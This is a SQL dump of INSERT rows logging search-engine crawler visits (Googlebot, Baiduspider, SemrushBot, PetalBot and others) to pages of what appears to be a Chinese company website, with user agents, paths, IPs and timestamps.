INSERT INTO `ey_weapp_spider_visit` VALUES ('97548', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/474.html', '185.191.171.3', '1661783529', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97121', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/280.html', '116.179.32.96', '1661597006', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97140', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/37.html', '185.191.171.2', '1661600815', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97163', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/58.html', '116.179.32.222', '1661609501', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97169', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/gongsijianjie', '114.119.151.153', '1661610606', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97172', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/410.html', '114.119.151.155', '1661610836', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97123', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661597364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97174', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_35.html', '185.191.171.22', '1661611288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97177', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/chukouquanqiu/', '66.249.79.110', '1661612053', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97124', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/280.html', '116.179.32.76', '1661597899', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97147', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1661604596', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97155', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/412.html', '114.119.151.155', '1661608376', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97180', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/219.html', '185.191.171.36', '1661613456', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97186', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/386.html', '185.191.171.41', '1661617397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97110', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/296.html', '116.179.32.43', '1661593434', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97188', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/38.html', '116.179.32.175', '1661621611', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97189', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_30/', '185.191.171.44', '1661622369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97108', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_25/', '185.191.171.19', '1661591273', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97190', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/324.html', '66.249.79.108', '1661623186', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97535', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_12.html', '185.191.171.5', '1661778402', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97112', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/340.html', '17.121.112.112', '1661593463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97092', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/69.html', '185.191.171.3', '1661584608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97165', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/106.html', '114.119.151.153', '1661609872', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97238', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.112', '1661644464', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97478', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/58.html', '185.191.171.18', '1661749734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97078', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_4/', '114.119.151.155', '1661577895', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97195', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/418.html', '185.191.171.44', '1661624827', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97070', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/464.html', '114.119.151.153', '1661575111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97073', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/315.html', '66.249.79.108', '1661576602', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97529', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/136.html', '185.191.171.3', '1661776309', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97524', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/447.html', '207.46.13.144', '1661774209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97525', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/136.html', '216.244.66.194', '1661775531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97066', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/315.html', '66.249.79.110', '1661573311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97076', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1661577159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97067', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/343.html', '220.181.108.80', '1661573800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97068', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.110', '1661574420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97245', '99', 'mozilla/5.0 (compatible; seznambot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', '/', '77.75.76.166', '1661646595', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97477', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/464.html', '216.244.66.194', '1661749371', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97248', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661647670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97249', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/122.html', '66.249.79.112', '1661647721', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97520', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/499.html', '66.249.79.108', '1661773058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97517', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/76.html', '185.191.171.43', '1661770778', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97514', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tjs.html', '114.119.151.153', '1661768774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97515', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/kms.html', '114.119.151.155', '1661769161', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97510', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/225.html', '185.191.171.17', '1661765264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97262', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_24/', '185.191.171.40', '1661653923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97464', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_64/', '114.119.151.155', '1661741616', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97272', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_39/', '66.249.79.110', '1661657721', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97455', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/57_4.html', '185.191.171.34', '1661738186', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97290', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/116.html', '66.249.79.108', '1661663168', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97293', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/89.html', '114.119.151.155', '1661663454', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97294', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1661663722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97442', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_59/', '114.119.151.153', '1661733160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97083', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.127', '1661579546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97446', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/23_4.html', '66.249.79.110', '1661734946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97447', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/467.html', '114.119.151.155', '1661734972', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97436', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/10.html', '116.179.32.66', '1661729512', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97437', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/50.html', '185.191.171.14', '1661730244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97274', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_13/', '116.179.32.130', '1661659039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97275', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/240.html', '66.249.79.112', '1661659209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97208', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/150.html', '116.179.32.47', '1661632303', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97509', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/339.html', '114.119.151.153', '1661764330', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97276', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/154.html', '66.249.79.110', '1661659388', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97452', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/382.html', '114.119.151.153', '1661736550', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97080', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.127', '1661578394', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97063', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/192.html', '66.249.79.110', '1661572629', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97046', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/229.html', '185.191.171.18', '1661566728', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97213', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zgs.html', '114.119.151.155', '1661636353', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97507', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/199.html', '114.119.151.155', '1661764033', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97508', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/150.html', '116.179.32.237', '1661764120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97304', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.108', '1661667321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97429', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661726935', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97278', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/336.html', '17.121.115.144', '1661659613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97281', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/153.html', '185.191.171.36', '1661661384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97312', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/84.html', '66.249.79.110', '1661669483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97037', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_34/', '114.119.151.155', '1661563801', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97039', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_15', '114.119.151.153', '1661564955', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97036', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/204.html', '216.244.66.194', '1661562624', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97038', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20.html', '116.179.32.170', '1661563980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97035', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/359.html', '216.244.66.194', '1661562541', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97045', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.171', '1661566546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97031', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.112', '1661561179', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97029', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/343.html', '114.119.151.155', '1661560735', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97033', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1661561801', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97506', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/163.html', '66.249.79.108', '1661763816', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97050', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20.html', '116.179.32.209', '1661568893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97021', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/160.html', '114.119.151.155', '1661558375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97051', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661568982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97279', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/63.html', '114.119.151.153', '1661660734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97280', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.108', '1661661213', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96998', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/377.html', '185.191.171.35', '1661547637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97004', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/194.html', '216.244.66.194', '1661552563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96999', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/355.html', '216.244.66.194', '1661549555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98783', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/chukouquanqiu', '114.119.151.155', '1662343152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97001', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/honor/25.html', '185.191.171.42', '1661551291', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97026', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/100.html', '66.249.79.110', '1661560305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96994', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_17.html', '185.191.171.11', '1661545426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96997', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/347.html', '17.121.112.171', '1661547354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96990', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_11.html', '220.181.108.84', '1661544344', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97002', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/126.html', '185.191.171.6', '1661551994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96984', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_6.html', '185.191.171.41', '1661541262', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96973', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/219.html', '66.249.79.108', '1661537051', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96972', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sgs.html', '114.119.151.153', '1661537001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96971', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/451.html', '157.55.39.153', '1661536639', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96961', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jilin.html', '114.119.151.155', '1661531567', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96962', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/157.html', '114.119.151.153', '1661532136', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96958', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/255.html', '66.249.79.112', '1661527867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96964', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baicheng.html', '114.119.151.155', '1661533952', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96965', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_49/', '114.119.151.155', '1661534218', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96966', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/73.html', '114.119.151.155', '1661534802', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96968', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/222.html', '114.119.151.153', '1661535474', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98786', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.74', '1662343972', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97027', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/336.html', '66.249.79.110', '1661560504', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96988', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/218.html', '114.119.151.155', '1661543511', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98788', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/451.html', '185.191.171.2', '1662345811', '0');
